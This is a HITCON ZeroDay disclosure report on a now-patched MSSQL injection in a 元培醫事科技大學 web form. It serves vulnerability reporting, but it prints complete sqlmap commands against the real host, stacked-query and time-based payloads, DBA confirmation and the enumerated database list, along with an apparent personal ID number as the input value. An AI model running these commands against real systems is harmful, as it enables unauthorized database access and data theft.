元培醫事科技大學 MSSQL注入 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2026-01090
  •  發信 Vendor: 元培醫事科技大學
  • Title: 元培醫事科技大學 MSSQL注入
  • Introduction: MSSQL注入 含DBA

處理狀態

目前狀態

公開
Last Update : 2026/09/19
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 未複測
  • 公開

處理歷程

  • 2026/08/25 09:51:08 : 新提交 (由 桃園怪人協會幹部之一 更新此狀態)
  • 2026/08/25 09:58:50 : 新提交 (由 桃園怪人協會幹部之一 更新此狀態)
  • 2026/08/31 11:41:46 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/08/31 17:54:02 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/08/31 17:54:02 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/08/31 17:54:02 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/09/11 13:38:13 : 已修補 (由 組織帳號 更新此狀態)
  • 2026/09/19 03:00:22 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://f6.ypu.edu.tw/hello/default2.aspx
https://w3.ypu.edu.tw/yu/index2019.html
以下是元培官網
https://www.ypu.edu.tw/
網域是同一個 我忘了怎麼進去了 瞎點的 應該屬於廢棄區塊

敘述

元培

sqlmap -u "https://f6.ypu.edu.tw/hello/default2.aspx" \
  --data "__VIEWSTATE=Ps58jNUCLZn02w78Dv0XurO9P%2Fs5tJK70qurpORm0xzFaFL%2FHvmR%2BpyO%2B6yu2dS9dmXkjj51uHn2ukU03sTkC8MMa5TL9sAmLvj%2BIraja0o%3D&__VIEWSTATEGENERATOR=3749648C&__EVENTVALIDATION=Krwv6oZlMQFQftGjpRnv%2BGhRWcwiwmBd0EIpUWF3Ofn1FktbG8bb2UmMGFlGNnB4lmqQfGVVlo1tEFTxSPf6lUPVDG45dpLSOl%2Bx9XCTvoeMoP3JqTr6W%2Bn0TULNhYItOmkGphCzpf3zgKk9mvmaEQ%3D%3D&TextBox2=H126025416&Button1=%E6%9F%A5%E8%A9%A2" \
  -p "TextBox2" \
  --batch \
  --random-agent \
  --threads 3 \
  --tamper space2comment \
  --level 3 \
  --risk 2 \
  --hex
Parameter: TextBox2 (POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: __VIEWSTATE=gOteFRiqN42R0lvREriNhIG53uz0QTGgbjzuz3SpICJ/039ew23eBxywgdziTBCaFpMhMN2aAkG9hNoEs0r0tBwU1v4FSry4ja7u7nl94sc6Um2wOFI3rFpl+92alkMLz2+Oiz9MPi18qlRShzs9Km9xLCrcBFIuADWwo23QxwY=&__VIEWSTATEGENERATOR=3749648C&__EVENTVALIDATION=Gc6Q7UKMR7cT/QV4d5JVT0NLskkN6hof+PfL5HLu1R6xu2+5vEHY3tbMjOCqIhje+kpSyKQTf7nbzMxRok9d3vPOrJJUOlGBGAZkW9IlaAOzaFkhDop3sHni8lwlivpC/7HgYJCNTne1Ca+1vDRtcw==&TextBox2=H126025416';IF(3095=3095) SELECT 3095 ELSE DROP FUNCTION kyqx--&Button1=\xe6\x9f\xa5\xe8\xa9\xa2

    Type: error-based
    Title: Microsoft SQL Server error-based - Stacking (RAISERROR)
    Payload: __VIEWSTATE=gOteFRiqN42R0lvREriNhIG53uz0QTGgbjzuz3SpICJ/039ew23eBxywgdziTBCaFpMhMN2aAkG9hNoEs0r0tBwU1v4FSry4ja7u7nl94sc6Um2wOFI3rFpl+92alkMLz2+Oiz9MPi18qlRShzs9Km9xLCrcBFIuADWwo23QxwY=&__VIEWSTATEGENERATOR=3749648C&__EVENTVALIDATION=Gc6Q7UKMR7cT/QV4d5JVT0NLskkN6hof+PfL5HLu1R6xu2+5vEHY3tbMjOCqIhje+kpSyKQTf7nbzMxRok9d3vPOrJJUOlGBGAZkW9IlaAOzaFkhDop3sHni8lwlivpC/7HgYJCNTne1Ca+1vDRtcw==&TextBox2=H126025416';DECLARE @rYOw NVARCHAR(4000);SET @rYOw=(SELECT 'qbkpq'+REPLACE((SELECT (CASE WHEN (1713=1713) THEN '1' ELSE '0' END)),'%','%%')+'qbvkq');RAISERROR(@rYOw,16,1)--&Button1=\xe6\x9f\xa5\xe8\xa9\xa2

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=gOteFRiqN42R0lvREriNhIG53uz0QTGgbjzuz3SpICJ/039ew23eBxywgdziTBCaFpMhMN2aAkG9hNoEs0r0tBwU1v4FSry4ja7u7nl94sc6Um2wOFI3rFpl+92alkMLz2+Oiz9MPi18qlRShzs9Km9xLCrcBFIuADWwo23QxwY=&__VIEWSTATEGENERATOR=3749648C&__EVENTVALIDATION=Gc6Q7UKMR7cT/QV4d5JVT0NLskkN6hof+PfL5HLu1R6xu2+5vEHY3tbMjOCqIhje+kpSyKQTf7nbzMxRok9d3vPOrJJUOlGBGAZkW9IlaAOzaFkhDop3sHni8lwlivpC/7HgYJCNTne1Ca+1vDRtcw==&TextBox2=H126025416';WAITFOR DELAY '0:0:5'--&Button1=\xe6\x9f\xa5\xe8\xa9\xa2

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF)
    Payload: __VIEWSTATE=gOteFRiqN42R0lvREriNhIG53uz0QTGgbjzuz3SpICJ/039ew23eBxywgdziTBCaFpMhMN2aAkG9hNoEs0r0tBwU1v4FSry4ja7u7nl94sc6Um2wOFI3rFpl+92alkMLz2+Oiz9MPi18qlRShzs9Km9xLCrcBFIuADWwo23QxwY=&__VIEWSTATEGENERATOR=3749648C&__EVENTVALIDATION=Gc6Q7UKMR7cT/QV4d5JVT0NLskkN6hof+PfL5HLu1R6xu2+5vEHY3tbMjOCqIhje+kpSyKQTf7nbzMxRok9d3vPOrJJUOlGBGAZkW9IlaAOzaFkhDop3sHni8lwlivpC/7HgYJCNTne1Ca+1vDRtcw==&TextBox2=H126025416' WAITFOR DELAY '0:0:5'-- qUEQ&Button1=\xe6\x9f\xa5\xe8\xa9\xa2
選E 查DBA 居然是欸 current user is DBA: True
sqlmap -u "https://f6.ypu.edu.tw/hello/default2.aspx" \
  --data "__VIEWSTATE=Ps58jNUCLZn02w78Dv0XurO9P%2Fs5tJK70qurpORm0xzFaFL%2FHvmR%2BpyO%2B6yu2dS9dmXkjj51uHn2ukU03sTkC8MMa5TL9sAmLvj%2BIraja0o%3D&__VIEWSTATEGENERATOR=3749648C&__EVENTVALIDATION=Krwv6oZlMQFQftGjpRnv%2BGhRWcwiwmBd0EIpUWF3Ofn1FktbG8bb2UmMGFlGNnB4lmqQfGVVlo1tEFTxSPf6lUPVDG45dpLSOl%2Bx9XCTvoeMoP3JqTr6W%2Bn0TULNhYItOmkGphCzpf3zgKk9mvmaEQ%3D%3D&TextBox2=H126025416&Button1=%E6%9F%A5%E8%A9%A2" \
  -p "TextBox2" \
  --batch \
  --random-agent \
  --threads 3 \
  --tamper space2comment \
  --level 3 \
  --risk 2 \
  --technique=E \
  --is-dba \
  --hex
選E 查名 sa
sqlmap -u "https://f6.ypu.edu.tw/hello/default2.aspx" \
  --data "__VIEWSTATE=Ps58jNUCLZn02w78Dv0XurO9P%2Fs5tJK70qurpORm0xzFaFL%2FHvmR%2BpyO%2B6yu2dS9dmXkjj51uHn2ukU03sTkC8MMa5TL9sAmLvj%2BIraja0o%3D&__VIEWSTATEGENERATOR=3749648C&__EVENTVALIDATION=Krwv6oZlMQFQftGjpRnv%2BGhRWcwiwmBd0EIpUWF3Ofn1FktbG8bb2UmMGFlGNnB4lmqQfGVVlo1tEFTxSPf6lUPVDG45dpLSOl%2Bx9XCTvoeMoP3JqTr6W%2Bn0TULNhYItOmkGphCzpf3zgKk9mvmaEQ%3D%3D&TextBox2=H126025416&Button1=%E6%9F%A5%E8%A9%A2" \
  -p "TextBox2" \
  --batch \
  --random-agent \
  --threads 3 \
  --tamper space2comment \
  --level 3 \
  --risk 2 \
  --technique=E \
  --current-user \
  --hex
選E 查庫 sa
sqlmap -u "https://f6.ypu.edu.tw/hello/default2.aspx" \
  --data "__VIEWSTATE=Ps58jNUCLZn02w78Dv0XurO9P%2Fs5tJK70qurpORm0xzFaFL%2FHvmR%2BpyO%2B6yu2dS9dmXkjj51uHn2ukU03sTkC8MMa5TL9sAmLvj%2BIraja0o%3D&__VIEWSTATEGENERATOR=3749648C&__EVENTVALIDATION=Krwv6oZlMQFQftGjpRnv%2BGhRWcwiwmBd0EIpUWF3Ofn1FktbG8bb2UmMGFlGNnB4lmqQfGVVlo1tEFTxSPf6lUPVDG45dpLSOl%2Bx9XCTvoeMoP3JqTr6W%2Bn0TULNhYItOmkGphCzpf3zgKk9mvmaEQ%3D%3D&TextBox2=H126025416&Button1=%E6%9F%A5%E8%A9%A2" \
  -p "TextBox2" \
  --batch \
  --random-agent \
  --threads 3 \
  --tamper space2comment \
  --level 3 \
  --risk 2 \
  --technique=E \
  --dbs \
  --hex
[09:40:06] [INFO] retrieved: 'sync'
[09:40:06] [INFO] retrieved: 'tempdb'
[09:40:06] [INFO] retrieved: 'vendor'
[09:40:06] [INFO] retrieved: 'yist'
[09:40:06] [INFO] retrieved: 'yist2'
[09:40:06] [INFO] retrieved: 'yucc'
[09:40:06] [INFO] retrieved: 'yuload'
available databases [28]:
[*] ab_111_acc
[*] ab_111_apply
[*] ab_111_ug
[*] ab_112_apply
[*] ab_112_ug
[*] EEP
[*] eep2019
[*] eep2019_snapshot
[*] eep2019_snapshot2
[*] eep2023
[*] master
[*] model
[*] msdb
[*] newdb
[*] out_src
[*] rep
[*] ReportServer
[*] ReportServer2
[*] ReportServer2TempDB
[*] ReportServerTempDB
[*] sso
[*] sync
[*] tempdb
[*] vendor
[*] yist
[*] yist2
[*] yucc
[*] yuload

初次認真嘗試使用Markdown語法

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;